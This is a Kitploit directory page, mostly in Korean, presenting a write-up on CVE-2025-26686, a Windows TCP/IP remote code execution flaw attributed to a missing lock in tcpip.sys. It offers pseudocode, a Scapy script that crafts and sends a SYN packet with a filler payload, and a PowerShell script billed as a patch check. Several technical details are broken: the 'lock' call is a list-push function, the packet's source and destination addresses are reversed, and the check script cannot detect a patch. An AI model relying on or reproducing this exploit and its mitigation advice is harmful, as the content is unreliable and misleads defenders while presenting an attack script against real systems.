Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-26686-The-TCP-IP-Flaw-That-Opens-the-Gates — Windows TCP/IP 스택의 심각한 RCE 취약점(CVE-2025-26686)으로 인해 중요한 메모리가 잠금 해제되어 원격 공격자가 시스템을 탈취할 수 있습니다. 네트워크를 통해 악용 가능하며, 전체 시스템 장악 위험이 있습니다. 지금 패치하세요. | Kitploit
도구/GitHubGitHub/mrk336/cve-2025-26686-the-tcp-ip-flaw-that-opens-the-gates
Payload GenerationVulnerability AnalysisExploitationNetwork SecurityPenetration TestingLearning & EducationBinary Exploitation
GitHubmrk336/cve-2025-26686-the-tcp-ip-flaw-that-opens-the-gates

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-26686-The-TCP-IP-Flaw-That-Opens-the-Gates

Windows TCP/IP 스택의 심각한 RCE 취약점(CVE-2025-26686)으로 인해 중요한 메모리가 잠금 해제되어 원격 공격자가 시스템을 탈취할 수 있습니다. 네트워크를 통해 악용 가능하며, 전체 시스템 장악 위험이 있습니다. 지금 패치하세요.

저장소 보기
329111개월 전Kitploit 검토 완료

CVE-2025-26686-문을-여는-TCP-IP-결함

Windows TCP/IP 스택의 치명적인 RCE 취약점(CVE-2025-26686)이 민감한 메모리 잠금 해제를 방치하여 원격 공격자가 시스템을 탈취할 수 있습니다. 네트워크를 통해 악용 가능하며, 완전한 장악 위험이 있습니다. 지금 패치하세요.

작성자: Mark Mallia

유형: 원격 코드 실행 (RCE)
심각도: 심각
공격 벡터: 네트워크 기반
영향을 받는 시스템: Windows 10, 11 및 Server 에디션


요약

Microsoft TCP/IP 스택에서 CVE‑2025‑26686로 식별된 새로운 결함이 발견되었습니다. 이 결함은 암호화 키, 세션 데이터 또는 네트워크 구성을 저장하는 메모리의 중요한 영역에 대한 잠금 누락에서 비롯됩니다. 해당 영역이 패킷 처리 중 보호되지 않기 때문에 공격자는 네트워크를 통해 해당 정보를 읽거나 변경하고 로컬 관리자 수준의 액세스 권한을 얻을 수 있습니다.


문제는 무엇인가요?

Windows 10/11/Server의 TCP/IP 스택은 세션 데이터를 보유하는 특정 버퍼에 쓸 때 적절한 스핀 잠금을 획득하지 않습니다. 잠금 누락으로 인해 두 패킷이 서로 경쟁할 수 있으며, 원래 프로세스가 쓰기를 완료하기 전에 공격자가 버퍼에 악성 코드를 삽입할 수 있습니다.

핵심 사항:

  • 이 결함은 암호화 키나 기타 민감한 데이터를 포함할 수 있는 메모리 영역과 관련됩니다.
  • 네트워크 기반 – 물리적 액세스가 필요하지 않습니다.
  • 성공한 공격자는 로컬 관리자 권한을 획득하여 사실상 호스트를 장악합니다.

기술 분석

이 취약점은 tcpip.sys 모듈, 특히 인바운드 TCP 세그먼트를 처리하는 루틴 주변에서 나타납니다. '세션 데이터' 블록을 업데이트하는 코드 경로는 메모리에 쓰기 전에 잠금을 획득해야 합니다. 최근 Windows 릴리스에서는 조건부 분기에서 잠금이 생략되어 보호되지 않은 쓰기가 발생할 수 있습니다.

최소 재현 가능 예제는 아래와 같습니다(C++ 스타일 의사 코드).

root@kitploit:~
// tcpip.sys – 문제가 있는 영역
void TcpIpHandleSegment(Packet *p)
{
    // … 이전 코드 …

    if (p->flags & SYN_FLAG) {
        /* 여기에 잠금 누락 */
        memcpy(&sessionData, p->payload, p->len);
        // … 이후 코드 …
    }
}

올바르게 보호된 버전에서는 중요한 섹션이 인터록된 스핀 잠금으로 보호됩니다:

root@kitploit:~
// tcpip.sys – 수정된 영역
void TcpIpHandleSegment(Packet *p)
{
    // … 이전 코드 …

    if (p->flags & SYN_FLAG) {
        _InterlockedPushEntrySList(&SessionLock, &sessionData);
        memcpy(&sessionData, p->payload, p->len);
        // … 이후 코드 …
    }
}

패치는 _InterlockedPushEntrySList에 대한 호출을 추가하여 sessionData가 업데이트되는 동안 독점 액세스를 보장합니다.


제작

취약점은 SYN 플래그를 포함하는 인바운드 TCP 세그먼트가 tcpip.sys에 도달할 때 트리거됩니다.

패킷이 해당 코드 경로와 일치하도록 하기 위해 다음 필드를 설정합니다:

Layer Field Typical value for CVE‑2025‑26686 IP src Target host’s IP address (e.g. 10.0.0.10) dst Attacker’s IP (e.g. 192.168.1.2) TCP sport Attacker’s port (e.g. 4444) dport Target service’s listening port (e.g. 80 for HTTP) flags “S” for SYN to hit the branch in TcpIpHandleSegment

root@kitploit:~
ip_layer = IP(src="10.0.0.10", dst="192.168.1.2")
tcp_layer = TCP(sport=4444, dport=80, flags="S")

# The payload carries the data that will overwrite sessionData in tcpip.sys.
payload = "ExploitKey" + "A"*512   # 512 bytes of crafted content

Combine into a single packet

root@kitploit:~
pkt = ip_layer / tcp_layer / Raw(load=payload)

At this point you may verify the packet structure:

root@kitploit:~
pkt.show()

The output will reveal fields such as IP → src, dst; TCP → sport, dport, flags; and a Raw payload of 512 bytes.

This is the exact sequence that Windows expects when it processes inbound segments with the SYN flag.

Dispatch the packet over the network

root@kitploit:~
send(pkt)

The command sends the packet directly from your machine into the target host’s TCP/IP stack.

If you are running the script on a Linux VM that has Scapy installed, the packet will reach the Windows machine and trigger the code path in tcpip.sys.


영향

공격자가 암호화 키나 세션 구성을 포함하는 메모리를 수정할 수 있기 때문에 이 결함은 다음을 가능하게 합니다:

  1. 원격 악용 – 공격자는 조작된 패킷 하나만 보내면 됩니다.
  2. 권한 상승 – 악성 코드가 주입되면 로컬 관리자 권한으로 실행됩니다.
  3. 전체 시스템 장악 – 성공적인 공격은 네트워크 전반에 걸쳐 지속성과 측면 이동을 허용할 수 있습니다.

완화 단계

  1. 공급업체가 제공한 핫픽스를 가능한 한 빨리 배포하십시오.
  2. Microsoft 보안 권고 포털에서 Windows 10, 11 또는 Server용 최신 누적 업데이트를 다운로드하십시오.
  3. 영향을 받는 모듈을 수동으로 패치하십시오(즉시 패치를 받을 수 없는 환경의 경우).
  4. 취약점 스캐너를 실행하여 수정 사항이 올바르게 적용되었는지 확인하십시오.

다음 빠른 확인 스크립트를 사용하여 시스템에 잠금이 있는지 확인할 수 있습니다:

root@kitploit:~
# Verify the interlocked entry is present in tcpip.sys
Get-ChildItem -Path C:\Windows\System32\tcpip.sys |
    Select-Object Name, @{Name='PatchPresent';Expression={
        $_.FullName -match '_InterlockedPushEntrySList' } }

PatchPresent가 $True를 반환하면 완화 조치가 적용된 것입니다.


결론

CVE-2025-26686은 단순히 취약점 데이터베이스의 또 다른 항목이 아닙니다. 그것은 경종을 울리는 신호입니다. TCP/IP 스택과 같은 기반 구성 요소가 손상되면 그 여파는 전체 네트워크와 산업에 걸쳐 느껴질 수 있습니다. 이 결함은 가장 신뢰할 수 있는 시스템조차 끊임없는 주의와 관리가 필요함을 상기시킵니다. 엔지니어이자 수호자로서 우리의 책임은 이러한 취약점을 이해하는 것뿐만 아니라 정직하게 행동하는 것입니다. 여기에 공유된 정보는 방어를 강화하고 책임 있는 패치를 알리며 조직이 사용자를 보호할 수 있도록 지원하는 윤리적 목적으로만 사용됩니다.

도구 다운로드